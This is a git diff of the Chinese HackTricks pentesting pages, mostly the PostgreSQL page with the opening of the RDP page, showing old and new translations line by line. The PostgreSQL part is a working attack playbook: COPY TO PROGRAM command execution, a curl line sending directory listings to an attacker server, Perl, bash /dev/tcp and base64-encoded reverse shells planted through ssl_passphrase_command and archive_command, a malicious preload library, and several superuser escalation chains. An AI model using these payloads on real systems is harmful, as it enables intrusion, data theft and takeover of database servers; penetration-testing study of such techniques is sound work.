SELECT lo_from_bytea(13338,decode('{BASE64_ENCODED_EDITED_FILENODE}','base64'))
SELECT lo_export(13338,'{PSQL_DATA_DIRECTORY}/{RELATION_FILEPATH}')
```
7. _(可选)_ 通过运行昂贵的 SQL 查询来清除内存表缓存
7. _(可选)_ 通过运行一个昂贵的SQL查询来清除内存中的表缓存
```sql
SELECT lo_from_bytea(133337, (SELECT REPEAT('a', 128*1024*1024))::bytea)
```
8. 您现在应该在 PostgreSQL 中看到更新后的表值。
8. 现在您应该在PostgreSQL中看到更新的表值。
您还可以通过编辑 `pg_authid` 表成为超级管理员。**请参阅**[**以下部分**](pentesting-postgresql.md#privesc-by-overwriting-internal-postgresql-tables)。
您还可以通过编辑`pg_authid`表成为超级管理员。**请参见** [**以下部分**](pentesting-postgresql.md#privesc-by-overwriting-internal-postgresql-tables)。
## RCE
### **RCE 到程序**
### **RCE到程序**
自[版本 9.3](https://www.postgresql.org/docs/9.3/release-9-3.html)起,只有**超级用户**和**`pg_execute_server_program`**组的成员才能使用 copy 进行 RCE带有数据泄露的示例:
自[版本9.3](https://www.postgresql.org/docs/9.3/release-9-3.html)以来,只有**超级用户**和**`pg_execute_server_program`**组的成员可以使用copy进行RCE带有外泄的示例:
```sql
'; copy (SELECT '') to program 'curl http://YOUR-SERVER?f=`ls -l|base64`'-- -
```
@ -447,25 +400,25 @@ DROP TABLE IF EXISTS cmd_exec;
COPY files FROM PROGRAM 'perl -MIO -e ''$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"192.168.0.104:80");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;''';
```
{% hint style="warning" %}
请记住,如果您不是超级用户但具有 **`CREATEROLE`** 权限,则可以**将自己添加到该组中**
请记住,如果您不是超级用户但拥有 **`CREATEROLE`** 权限,您可以 **使自己成为该组的成员**
```sql
GRANT pg_execute_server_program TO username;
```
[**更多信息**](pentesting-postgresql.md#privilege-escalation-with-createrole)
[**更多信息**](pentesting-postgresql.md#privilege-escalation-with-createrole)
{% endhint %}
或者使用 **metasploit** `multi/postgres/postgres_copy_from_program_cmd_exec` 模块。\
关于此漏洞的更多信息请查看[**这里**](https://medium.com/greenwolf-security/authenticated-arbitrary-command-execution-on-postgresql-9-3-latest-cd18945914d5)。尽管被报告为 CVE-2019-9193但 Postges 声称这是一个[功能,并不会修复](https://www.postgresql.org/about/news/cve-2019-9193-not-a-security-vulnerability-1935/)。
或者使用 **metasploit**`multi/postgres/postgres_copy_from_program_cmd_exec` 模块。\
关于此漏洞的更多信息 [**在这里**](https://medium.com/greenwolf-security/authenticated-arbitrary-command-execution-on-postgresql-9-3-latest-cd18945914d5)。虽然被报告为 CVE-2019-9193Postges 宣称这是一个 [特性并且不会修复](https://www.postgresql.org/about/news/cve-2019-9193-not-a-security-vulnerability-1935/)。
### 使用 PostgreSQL 语言进行 RCE
### 使用 PostgreSQL 语言 RCE
{% content-ref url="../pentesting-web/sql-injection/postgresql-injection/rce-with-postgresql-languages.md" %}
[rce-with-postgresql-languages.md](../pentesting-web/sql-injection/postgresql-injection/rce-with-postgresql-languages.md)
{% endcontent-ref %}
### 使用 PostgreSQL 扩展进行 RCE
### 使用 PostgreSQL 扩展 RCE
一旦你从之前的帖子中**学会了如何上传二进制文件**,你可以尝试获取**RCE 通过上传一个 PostgreSQL 扩展并加载它**
一旦你 **学习** 了之前的帖子 **如何上传二进制文件**,你可以尝试通过 **上传 PostgreSQL 扩展并加载它** 来获得 **RCE**
{% content-ref url="../pentesting-web/sql-injection/postgresql-injection/rce-with-postgresql-extensions.md" %}
[rce-with-postgresql-extensions.md](../pentesting-web/sql-injection/postgresql-injection/rce-with-postgresql-extensions.md)
@ -474,70 +427,70 @@ GRANT pg_execute_server_program TO username;
### PostgreSQL 配置文件 RCE
{% hint style="info" %}
以下 RCE 向量在受限制的 SQLi 上下文中特别有用,因为所有步骤都可以通过嵌套的 SELECT 语句执行
以下 RCE 向量在受限 SQLi 上下文中特别有用,因为所有步骤都可以通过嵌套的 SELECT 语句执行
{% endhint %}
PostgreSQL 的**配置文件**是由运行数据库的**postgres 用户**可写的,因此作为**超级用户**,您可以在文件系统中写入文件,因此您可以**覆盖此文件。**
PostgreSQL 的 **配置文件****可写的**,由 **postgres 用户** 拥有,该用户运行数据库,因此作为 **超级用户**,你可以在文件系统中写入文件,因此你可以 **覆盖此文件。**
![](<../.gitbook/assets/image (322).png>)
#### **使用 ssl\_passphrase\_command 进行 RCE**
#### **使用 ssl\_passphrase\_command RCE**
关于此技术的更多信息[请查看这里](https://pulsesecurity.co.nz/articles/postgres-sqli)。
关于此技术的更多信息 [在这里](https://pulsesecurity.co.nz/articles/postgres-sqli)。
配置文件具有一些有趣的属性,可以导致 RCE
配置文件中有一些有趣的属性可以导致 RCE
* `ssl_key_file = '/etc/ssl/private/ssl-cert-snakeoil.key'` 数据库私钥的路径
* `ssl_passphrase_command = ''` 如果私有文件受密码保护加密PostgreSQL 将**执行此属性中指定的命令**
* `ssl_passphrase_command_supports_reload = off` 如果此属性为**on**,则在执行 `pg_reload_conf()` 时,如果密钥受密码保护,将执行**命令**
* `ssl_passphrase_command = ''` 如果私钥文件受到密码保护加密PostgreSQL 将 **执行此属性中指示的命令**
* `ssl_passphrase_command_supports_reload = off` **如果** 此属性为 **on**,则 **如果** 密钥受到密码保护,**将执行** 在 `pg_reload_conf()`**执行** 时执行的 **命令**
然后,攻击者需要:
1. 从服务器**转储私钥**
2. **加密**下载的私钥:
1. **从服务器转储私钥**
2. **加密** 下载的私钥:
1. `rsa -aes256 -in downloaded-ssl-cert-snakeoil.key -out ssl-cert-snakeoil.key`
3. **覆盖**
4. **转储**当前的 PostgreSQL **配置**
5. 使用上述属性配置**覆盖** **配置**
4. **转储** 当前的 PostgreSQL **配置**
5. **用提到的属性配置覆盖** **配置**
1. `ssl_passphrase_command = 'bash -c "bash -i >& /dev/tcp/127.0.0.1/8111 0>&1"'`
2. `ssl_passphrase_command_supports_reload = on`
6. 执行 `pg_reload_conf()`
在测试中我注意到,只有当**私钥文件具有 640 权限****由 root 拥有**并由**组 ssl-cert 或 postgres 拥有**(因此 postgres 用户可以读取它),并且放置在 _/var/lib/postgresql/12/main_时,此方法才有效
在测试时,我注意到这仅在 **私钥文件权限为 640** 时有效,且 **由 root 拥有**,并且由 **ssl-cert 或 postgres 组** 拥有(因此 postgres 用户可以读取),并放置在 _/var/lib/postgresql/12/main_ 中。
#### **使用 archive\_command 进行 RCE**
#### **使用 archive\_command RCE**
有关此配置和 WAL 的更多[**信息请查看这里**](https://medium.com/dont-code-me-on-that/postgres-sql-injection-to-rce-with-archive-command-c8ce955cf3d3)**。**
**更多** [**关于此配置和 WAL 的信息在这里**](https://medium.com/dont-code-me-on-that/postgres-sql-injection-to-rce-with-archive-command-c8ce955cf3d3)**。**
配置文件中另一个可利用属性是 `archive_command`
配置文件中另一个可利用属性是 `archive_command`
为了使其工作,`archive_mode` 设置必须为 `'on'``'always'`。如果是这样,那么我们可以覆盖 `archive_command` 中的命令,并通过 WAL预写日志记录)操作强制执行它。
为了使其工作,`archive_mode` 设置必须为 `'on'``'always'`。如果为真,则我们可以覆盖 `archive_command` 中的命令,并通过 WAL预写日志操作强制执行它。
一般步骤如下
一般步骤
1. 检查归档模式是否启用:`SELECT current_setting('archive_mode')`
2. 使用有效载覆盖 `archive_command`。例如,一个反向 shell`archive_command = 'echo "dXNlIFNvY2tldDskaT0iMTAuMC4wLjEiOyRwPTQyNDI7c29ja2V0KFMsUEZfSU5FVCxTT0NLX1NUUkVBTSxnZXRwcm90b2J5bmFtZSgidGNwIikpO2lmKGNvbm5lY3QoUyxzb2NrYWRkcl9pbigkcCxpbmV0X2F0b24oJGkpKSkpe29wZW4oU1RESU4sIj4mUyIpO29wZW4oU1RET1VULCI+JlMiKTtvcGVuKFNUREVSUiwiPiZTIik7ZXhlYygiL2Jpbi9zaCAtaSIpO307" | base64 --decode | perl'`
1. 检查归档模式是否启用:`SELECT current_setting('archive_mode')`
2. 用有效载覆盖 `archive_command`。例如,一个反向 shell`archive_command = 'echo "dXNlIFNvY2tldDskaT0iMTAuMC4wLjEiOyRwPTQyNDI7c29ja2V0KFMsUEZfSU5FVCxTT0NLX1NUUkVBTSxnZXRwcm90b2J5bmFtZSgidGNwIikpO2lmKGNvbm5lY3QoUyxzb2NrYWRkcl9pbigkcCxpbmV0X2F0b24oJGkpKSkpe29wZW4oU1RESU4sIj4mUyIpO29wZW4oU1RET1VULCI+JlMiKTtvcGVuKFNUREVSUiwiPiZTIik7ZXhlYygiL2Jpbi9zaCAtaSIpO307" | base64 --decode | perl'`
3. 重新加载配置:`SELECT pg_reload_conf()`
4. 强制运行 WAL 操作,这将调用归档命令:`SELECT pg_switch_wal()` 或对于某些 Postgres 版本 `SELECT pg_switch_xlog()`
4. 强制 WAL 操作运行,这将调用归档命令:`SELECT pg_switch_wal()` 或 `SELECT pg_switch_xlog()` 对于某些 PostgreSQL 版本
#### **使用预加载库进行 RCE**
#### **使用预加载库 RCE**
有关此技术的更多信息[请查看这里](https://adeadfed.com/posts/postgresql-select-only-rce/)。
关于此技术的更多信息 [在这里](https://adeadfed.com/posts/postgresql-select-only-rce/)。
此攻击向量利用以下配置变量:
* `session_preload_libraries` -- PostgreSQL 服务器在客户端连接时将加载的库。
* `dynamic_library_path` -- PostgreSQL 服务器将搜索库的目录列表。
我们可以将 `dynamic_library_path` 值设置为一个由运行数据库的 `postgres` 用户写的目录,例如 `/tmp/` 目录,并在那里上传一个恶意的 `.so` 对象。接下来,我们将通过将其包含在 `session_preload_libraries` 变量中,强制 PostgreSQL 服务器加载我们新上传的库。
我们可以将 `dynamic_library_path` 值设置为一个由运行数据库的 `postgres` 用户写的目录,例如 `/tmp/` 目录,并在其中上传一个恶意的 `.so` 对象。接下来,我们将通过将其包含在 `session_preload_libraries` 变量中,强制 PostgreSQL 服务器加载我们新上传的库。
攻击步骤如下
攻击步骤
1. 下载原始 `postgresql.conf`
1. 下载原始 `postgresql.conf`
2. 在 `dynamic_library_path` 值中包含 `/tmp/` 目录,例如 `dynamic_library_path = '/tmp:$libdir'`
3. 在 `session_preload_libraries` 值中包含恶意库名称,例如 `session_preload_libraries = 'payload.so'`
4. 通过 `SELECT version()` 查询检查主要 PostgreSQL 版本
5. 使用正确的 PostgreSQL dev 包编译恶意库代码 示例代码:
4. 通过 `SELECT version()` 查询检查主要 PostgreSQL 版本
5. 使用正确的 PostgreSQL 开发包编译恶意库代码 示例代码:
```c
#include <stdio.h>
@ -585,17 +538,18 @@ gcc -I$(pg_config --includedir-server) -shared -fPIC -nostartfiles -o payload.so
```
6. 上传在步骤 2-3 中创建的恶意 `postgresql.conf`,并覆盖原始文件
7. 将步骤 5 中的 `payload.so` 上传到 `/tmp` 目录
8. 通过重新启动服务器或调用 `SELECT pg_reload_conf()` 查询重新加载服务器配置
9. 在下一个数据库连接时,您将收到反向 shell 连接。
## **Postgres提权**
8. 通过重启服务器或调用 `SELECT pg_reload_conf()` 查询重新加载服务器配置
9. 在下一个数据库连接时,你将收到反向 shell 连接。
### CREATEROLE提权
## **Postgres 权限提升**
#### **授权**
### CREATEROLE 权限提升
根据[**文档**](https://www.postgresql.org/docs/13/sql-grant.html): _具有**`CREATEROLE`**权限的角色可以**授予或撤销**任何**不是**超级用户的**角色**的成员资格。_
#### **授予**
因此,如果您拥有**`CREATEROLE`**权限,您可以授予自己访问其他**角色**(不是超级用户)的权限,这可以让您读取和写入文件以及执行命令:
根据 [**文档**](https://www.postgresql.org/docs/13/sql-grant.html)_拥有 **`CREATEROLE`** 权限的角色可以 **授予或撤销对任何角色的成员资格**,该角色 **不是** **超级用户**。_
因此,如果你拥有 **`CREATEROLE`** 权限,你可以授予自己对其他 **角色**(不是超级用户)的访问权限,这可以让你读取和写入文件并执行命令:
```sql
# Access to execute commands
GRANT pg_execute_server_program TO username;
@ -611,14 +565,14 @@ GRANT pg_write_server_files TO username;
#Change password
ALTER USER user_name WITH PASSWORD 'new_password';
```
#### 提升为超级用户
#### Privesc to SUPERUSER
很常见的情况是发现**本地用户可以在 PostgreSQL 中登录而无需提供任何密码**。因此,一旦你获得了**执行代码的权限**,你可以滥用这些权限来获得**`SUPERUSER`**角色:
很常见的是发现**本地用户可以在 PostgreSQL 中登录而无需提供任何密码**。因此,一旦您获得了**执行代码的权限**,您可以滥用这些权限来授予您**`SUPERUSER`** 角色:
```sql
COPY (select '') to PROGRAM 'psql -U <super_user> -c "ALTER USER <your_username> WITH SUPERUSER;"';
```
{% hint style="info" %}
这通常是因为**`pg_hba.conf`**文件中的以下可能存在
这通常是因为 **`pg_hba.conf`** 文件中的以下行:
```bash
# "local" is for Unix domain socket connections only
local all all trust
@ -629,15 +583,15 @@ host all all ::1/128 trust
```
{% endhint %}
### **ALTER TABLE提权**
### **ALTER TABLE privesc**
在[**这篇文章**](https://www.wiz.io/blog/the-cloud-has-an-isolation-problem-postgresql-vulnerabilities)中解释了如何通过滥用授予用户的ALTER TABLE权限来在Postgres GCP中进行**提权**。
在[**这篇文章**](https://www.wiz.io/blog/the-cloud-has-an-isolation-problem-postgresql-vulnerabilities)中解释了如何在Postgres GCP中利用授予用户的ALTER TABLE权限实现**privesc**。
您尝试**将另一个用户设为表的所有者**时,应该会收到一个**错误**来阻止此操作但显然GCP允许在GCP中的非超级用户postgres用户中执行此操作
你尝试**将另一个用户设为表的所有者**时,应该会收到一个**错误**来阻止它但显然GCP给了**非超级用户postgres用户**这个**选项**
<figure><img src="../.gitbook/assets/image (537).png" alt=""><figcaption></figcaption></figure>
将这个想法与以下事实结合起来:当在具有索引函数的表上执行**INSERT/UPDATE/ANALYZE**命令时,**函数**作为命令的一部分以**表所有者的权限**被**调用**。可以创建一个带有函数的索引,并将所有者权限授予该表的**超级用户**然后对具有恶意函数的表运行ANALYZE该函数将能够执行命令因为它正在使用所有者的权限。
将这个想法与**INSERT/UPDATE/**[**ANALYZE**](https://www.postgresql.org/docs/13/sql-analyze.html)命令在**具有索引函数的表**上执行时,**函数**作为命令的一部分以**表****所有者的权限**被**调用**的事实结合起来。可以创建一个带有函数的索引,并将该表的所有者权限授予**超级用户**然后在该表上运行ANALYZE使用恶意函数执行命令因为它使用的是所有者的权限。
```c
GetUserIdAndSecContext(&save_userid, &save_sec_context);
SetUserIdAndSecContext(onerel->rd_rel->relowner,
@ -646,10 +600,10 @@ save_sec_context | SECURITY_RESTRICTED_OPERATION);
#### 利用
1. 首先创建一个新表。
2. 向表中插入一些无关内容,以提供索引功能所需的数据。
2. 向表中插入一些无关内容,以提供索引函数的数据。
3. 开发一个包含代码执行有效负载的恶意索引函数,允许执行未经授权的命令。
4. 将表的所有者更改为"cloudsqladmin"这是GCP专门用于管理和维护数据库的超级用户角色
5. 对表执行ANALYZE操作。此操作迫使PostgreSQL引擎切换到表所有者"cloudsqladmin"的用户上下文。因此,恶意索引函数将以"cloudsqladmin"的权限调用,从而使先前未经授权的shell命令得以执行。
4. 将表的所有者更改为“cloudsqladmin”这是GCP的超级用户角色仅用于Cloud SQL管理和维护数据库
5. 对表执行ANALYZE操作。此操作迫使PostgreSQL引擎切换到表所有者“cloudsqladmin”的用户上下文。因此恶意索引函数以“cloudsqladmin”的权限被调用从而使之前未经授权的shell命令得以执行。
在PostgreSQL中这个流程看起来像这样
```sql
@ -672,13 +626,13 @@ LANGUAGE sql VOLATILE AS 'COPY public.shell_commands_results (data) FROM PROGRAM
ANALYZE public.temp_table;
```
然后,`shell_commands_results`表将包含执行代码的输出:
然后,`shell_commands_results` 表将包含执行代码的输出:
```
uid=2345(postgres) gid=2345(postgres) groups=2345(postgres)
```
### 本地登录
一些配置不当的PostgreSQL实例可能允许任何本地用户登录可以使用**`dblink`函数**从127.0.0.1本地登录:
一些配置错误的 postgresql 实例可能允许任何本地用户登录,可以使用 **`dblink` function** 从 127.0.0.1 本地登录:
```sql
\du * # Get Users
\l # Get databases
@ -691,13 +645,13 @@ dbname=somedb',
RETURNS (result TEXT);
```
{% hint style="warning" %}
请注意,为了使上一个查询工作,**需要存在函数 `dblink`**。如果不存在,您可以尝试使用以下命令创建它
请注意,之前的查询要正常工作**需要存在函数 `dblink`**。如果不存在,您可以尝试使用以下命令创建它
```sql
CREATE EXTENSION dblink;
```
{% endhint %}
如果您拥有具有更高权限的用户密码但该用户不允许从外部IP登录您可以使用以下函数以该用户身份执行查询
如果您拥有具有更高权限的用户密码,但该用户不允许从外部 IP 登录,您可以使用以下函数以该用户身份执行查询:
```sql
SELECT * FROM dblink('host=127.0.0.1
user=someuser
@ -705,13 +659,13 @@ dbname=somedb',
'SELECT usename,passwd from pg_shadow')
RETURNS (result TEXT);
```
可以使用以下方法检查该函数是否存在:
可以通过以下方式检查此函数是否存在:
```sql
SELECT * FROM pg_proc WHERE proname='dblink' AND pronargs=2;
```
### **具有** SECURITY DEFINER **的自定义定义函数**
### **自定义定义的函数与** SECURITY DEFINER
[**在这篇文章中**](https://www.wiz.io/blog/hells-keychain-supply-chain-attack-in-ibm-cloud-databases-for-postgresql),渗透测试人员能够在由IBM提供的postgres实例内提升权限因为他们**发现了带有 SECURITY DEFINER 标志的这个函数**
[**在这篇文章中**](https://www.wiz.io/blog/hells-keychain-supply-chain-attack-in-ibm-cloud-databases-for-postgresql),渗透测试人员能够在IBM提供的postgres实例中进行权限提升因为他们**发现了这个带有SECURITY DEFINER标志的函数**
<pre class="language-sql"><code class="lang-sql">CREATE OR REPLACE FUNCTION public.create_subscription(IN subscription_name text,IN host_ip text,IN portnum text,IN password text,IN username text,IN db_name text,IN publisher_name text)
RETURNS text
@ -732,9 +686,9 @@ PERFORM dblink_disconnect();
</code></pre>
如[**文档中所述**](https://www.postgresql.org/docs/current/sql-createfunction.html),具有**SECURITY DEFINER 的函数**将以**拥有它的用户的权限**执行。因此,如果函数**容易受到SQL注入攻击**或者使用了一些**由攻击者控制的参数执行特权操作**,则可能被滥用以**在postgres内提升权限**。
正如[**文档中所解释的**](https://www.postgresql.org/docs/current/sql-createfunction.html),带有**SECURITY DEFINER的函数是以** **拥有者的权限** **执行的**。因此,如果该函数**易受SQL注入攻击**或正在执行一些**由攻击者控制的参数的特权操作**,则可能被滥用以**在postgres中提升权限**。
上述代码的第4行中可以看到该函数具有**SECURITY DEFINER**标志。
前面代码的第4行中可以看到该函数具有**SECURITY DEFINER**标志。
```sql
CREATE SUBSCRIPTION test3 CONNECTION 'host=127.0.0.1 port=5432 password=a
user=ibm dbname=ibmclouddb sslmode=require' PUBLICATION test2_publication
@ -744,10 +698,10 @@ WITH (create_slot = false); INSERT INTO public.test3(data) VALUES(current_user);
<figure><img src="../.gitbook/assets/image (649).png" alt=""><figcaption></figcaption></figure>
### 使用 PL/pgSQL 进行暴力破解
### 使用 PL/pgSQL 进行密码暴力破解
**PL/pgSQL** 是一种**功能齐全的编程语言**与 SQL 相比提供了更大的过程控制。它支持使用**循环**和其他**控制结构**来增强程序逻辑。此外,**SQL 语句**和**触发器**可以调用使用**PL/pgSQL 语言**创建的函数。这种集成使得数据库编程和自动化可以采用更全面和多样化的方法。\
**您可以滥用这种语言来要求 PostgreSQL 对用户凭据进行暴力破解。**
**PL/pgSQL** 是一种**功能齐全的编程语言**相比 SQL 提供了更强的过程控制。它支持使用**循环**和其他**控制结构**来增强程序逻辑。此外,**SQL 语句**和**触发器**能够调用使用**PL/pgSQL 语言**创建的函数。这种集成使得数据库编程和自动化的方法更加全面和灵活。\
**您可以利用这种语言请求 PostgreSQL 进行用户凭据的暴力破解。**
{% content-ref url="../pentesting-web/sql-injection/postgresql-injection/pl-pgsql-password-bruteforce.md" %}
[pl-pgsql-password-bruteforce.md](../pentesting-web/sql-injection/postgresql-injection/pl-pgsql-password-bruteforce.md)
@ -756,23 +710,23 @@ WITH (create_slot = false); INSERT INTO public.test3(data) VALUES(current_user);
### 通过覆盖内部 PostgreSQL 表进行权限提升
{% hint style="info" %}
以下权限提升向量在受限制的 SQLi 上下文中特别有用,因为所有步骤都可以通过嵌套的 SELECT 语句执行
以下权限提升向量在受限的 SQLi 环境中特别有用,因为所有步骤都可以通过嵌套的 SELECT 语句执行
{% endhint %}
如果您可以**读写 PostgreSQL 服务器文件**,您可以通过覆盖与内部 `pg_authid`关联的 PostgreSQL 磁盘文件节点,**成为超级用户**。
如果您可以**读取和 PostgreSQL 服务器文件**,您可以通过覆盖与内部 `pg_authid`相关联的 PostgreSQL 磁盘文件节点来**成为超级用户**。
了解更多关于**这种技术**的信息[**在这里**](https://adeadfed.com/posts/updating-postgresql-data-without-update/)**。**
有关**此技术**的更多信息,请[**点击这里**](https://adeadfed.com/posts/updating-postgresql-data-without-update/)**。**
攻击步骤如下:
1. 获取 PostgreSQL 数据目录
2. 获取与 `pg_authid` 表关联的文件节点的相对路径
2. 获取与 `pg_authid`关联的文件节点的相对路径
3. 通过 `lo_*` 函数下载文件节点
4. 获取与 `pg_authid` 表关联的数据类型
5. 使用[PostgreSQL Filenode Editor](https://github.com/adeadfed/postgresql-filenode-editor)来[编辑文件节点](https://adeadfed.com/posts/updating-postgresql-data-without-update/#privesc-updating-pg\_authid-table); 将所有 `rol*` 布尔标志设置为 1 以获取完全权限。
4. 获取与 `pg_authid`关联的数据类型
5. 使用 [PostgreSQL 文件节点编辑器](https://github.com/adeadfed/postgresql-filenode-editor) [编辑文件节点](https://adeadfed.com/posts/updating-postgresql-data-without-update/#privesc-updating-pg_authid-table);将所有 `rol*` 布尔标志设置为 1 以获得完全权限。
6. 通过 `lo_*` 函数重新上传编辑后的文件节点,并覆盖磁盘上的原始文件
7. _(可选)_ 通过运行昂贵的 SQL 查询清除内存表缓存
8. 您现在应该具有完整超级管理员权限。
7. _(可选)_ 通过运行一个昂贵的 SQL 查询清除内存中的表缓存
8. 现在您应该拥有完整超级管理员的权限。
## **POST**
```
@ -782,9 +736,9 @@ msf> use auxiliary/admin/postgres/postgres_readfile
msf> use exploit/linux/postgres/postgres_payload
msf> use exploit/windows/postgres/postgres_payload
```
### 日志记录
### logging
_**postgresql.conf**_ 文件中,您可以通过更改以下内容来启用 postgresql 日志记录
_**postgresql.conf**_ 文件中,您可以通过更改以下内容来启用 postgresql 日志:
```bash
log_statement = 'all'
log_filename = 'postgresql-%Y-%m-%d_%H%M%S.log'
@ -793,12 +747,12 @@ sudo service postgresql restart
#Find the logs in /var/lib/postgresql/<PG_Version>/main/log/
#or in /var/lib/postgresql/<PG_Version>/main/pg_log/
```
然后,**重服务**。
然后,**重启服务**。
### pgadmin
[pgadmin](https://www.pgadmin.org) 是用于 PostgreSQL 的管理和开发平台。\
您可以在 _**pgadmin4.db**_ 文件中找到**密码**。\
[pgadmin](https://www.pgadmin.org) 是一个用于 PostgreSQL 的管理和开发平台。\
您可以在 _**pgadmin4.db**_ 文件中找到 **密码**。\
您可以使用脚本中的 _**decrypt**_ 函数对其进行解密:[https://github.com/postgres/pgadmin4/blob/master/web/pgadmin/utils/crypto.py](https://github.com/postgres/pgadmin4/blob/master/web/pgadmin/utils/crypto.py)
```bash
sqlite3 pgadmin4.db ".schema"
@ -808,6 +762,29 @@ string pgadmin4.db
```
### pg\_hba
PostgreSQL中的客户端身份验证通过一个名为**pg\_hba.conf**的配置文件进行管理。该文件包含一系列记录,每个记录指定连接类型、客户端IP地址范围如果适用、数据库名称、用户名以及用于匹配连接的身份验证方法。与连接类型、客户端地址、请求的数据库和用户名匹配第一条记录用于身份验证。如果身份验证失败,则没有回退或备份。如果没有记录匹配,则拒绝访问。
PostgreSQL中的客户端身份验证通过一个名为**pg\_hba.conf**的配置文件进行管理。该文件包含一系列记录,每条记录指定了连接类型、客户端IP地址范围如适用、数据库名称、用户名以及用于匹配连接的身份验证方法。第一个匹配连接类型、客户端地址、请求的数据库和用户名的记录用于身份验证。如果身份验证失败,则没有后备或备份。如果没有记录匹配,则拒绝访问。
在pg\_hba.conf中可用的基于密码的身份验证方法有**md5**、**crypt**和**password**。这些方法在密码传输方式上有所不同MD5哈希、crypt加密或明文。需要注意的是crypt方法不能与在pg\_authid中已加密的密码一起使用。
在pg\_hba.conf中可用的基于密码的身份验证方法有**md5**、**crypt**和**password**。这些方法在密码传输方式上有所不同MD5哈希、加密或明文。需要注意的是crypt方法不能与在pg\_authid中加密的密码一起使用。
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>Support HackTricks</summary>
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
<figure><img src="../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
\
Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=pentesting-postgresql) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
Get Access Today:
{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=pentesting-postgresql" %}

90
network-services-pentesting/pentesting-rdp.md
View file

@ -1,28 +1,29 @@
# 3389 - 渗透测试 RDP
# 3389 - Pentesting RDP
{% hint style="success" %}
学习和实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习和实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习 AWS 黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS 红队专家)</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持 HackTricks 的其他方式:
* 如果您想看到您的**公司在 HackTricks 中做广告**或**下载 PDF 版本的 HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
* 探索[**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或在 **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)** 上关注**我们。
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 分享黑客技巧。
</details>
{% endhint %}
<figure><img src="../.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure>
**即时可用的漏洞评估和渗透测试设置**。从任何地方运行完整的渗透测试,拥有 20 多种工具和功能,从侦察到报告。我们不取代渗逗者 - 我们开发定制工具、检测和利用模块,让他们有更多时间深入挖掘、弹出 shell 并享受乐趣。
**即时可用的漏洞评估和渗透测试设置**。从任何地方运行完整的渗透测试,使用 20 多种工具和功能,从侦察到报告。我们不替代渗透测试人员 - 我们开发自定义工具、检测和利用模块,以便让他们有更多时间深入挖掘、获取 shell 并享受乐趣。
{% embed url="https://pentest-tools.com/" %}
## 基本信息
Microsoft 开发,**远程桌面协议****RDP**)旨在实现计算机之间的图形界面连接。为建立这种连接,用户使用 **RDP** 客户端软件,同时,远程计算机需要运行 **RDP** 服务器软件。这种设置允许对远程计算机的桌面环境进行无缝控制和访问,实质上将其界面带到用户的本地设备上。
微软开发的 **远程桌面协议** (**RDP**) 旨在通过网络启用计算机之间的图形界面连接。为了建立这样的连接,用户使用 **RDP** 客户端软件,同时,远程计算机需要运行 **RDP** 服务器软件。此设置允许无缝控制和访问远程计算机的桌面环境,基本上将其界面带到用户的本地设备上。
**默认端口:** 3389
```
@ -31,7 +32,7 @@ PORT STATE SERVICE
```
## 枚举
### 自动
### 自动
{% code overflow="wrap" %}
```bash
@ -39,15 +40,15 @@ nmap --script "rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-info" -p 338
```
{% endcode %}
它检查可用的加密和DoS漏洞在不导致服务DoS的情况下并获取NTLM Windows信息版本
它检查可用的加密和DoS漏洞在不对服务造成DoS的情况下并获取NTLM Windows信息版本
### [暴力破解](../generic-methodologies-and-resources/brute-force.md#rdp)
**注意,您可能会锁定帐户**
**小心,您可能会锁定账户**
### **密码喷洒**
